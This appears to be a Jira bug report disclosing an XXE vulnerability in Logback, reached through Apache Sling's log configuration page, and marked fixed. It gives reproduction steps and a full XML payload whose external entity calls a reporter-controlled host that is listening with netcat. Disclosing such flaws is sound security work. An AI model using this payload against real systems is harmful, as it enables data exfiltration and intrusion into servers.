Uploaded image for project: 'logback'
  1. logback
  2. LOGBACK-1465

xxe vulnerability in Logback

    XMLWordPrintable

Details

    • Icon: Bug Bug
    • Resolution: Fixed
    • Icon: Critical Critical
    • 1.2.6, 1.3.0-alpha7
    • None
    • logback-core

    • I test Apache Sling latest version 11 integrating Logback running on windows system 

    Description

      Hi,I find xxe vulnerability in Logback when testing Apache Sling latest version 11 integrating Logback.

      First I login in Sling as an admin.
      The vulnerable url is http://127.0.0.1:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager.
      In the " Logback Config File "  field,I input "\\192.168.0.102\c$\xxe.xml" as shown below.

      The content of the xxe.xml under c:\  directory on the server 192.168.0.102 is 

      <?xml version="1.0"?><!DOCTYPE r [<!ENTITY % sp SYSTEM "http://192.168.0.102:8090/sling">%sp;]>
       
       After click "save"  ,the netcat running on the server  192.168.0.102 and listening to the port 8090 receives the request as shown below.

       
      **

      Attachments

        1. image-2019-05-09-15-43-09-668.png
          80 kB
        2. image-2019-05-09-15-43-25-103.png
          37 kB

        Activity

          People

            ceki Ceki Gülcü
            shuiboye shuiboye
            Votes:
            1 Vote for this issue
            Watchers:
            6 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: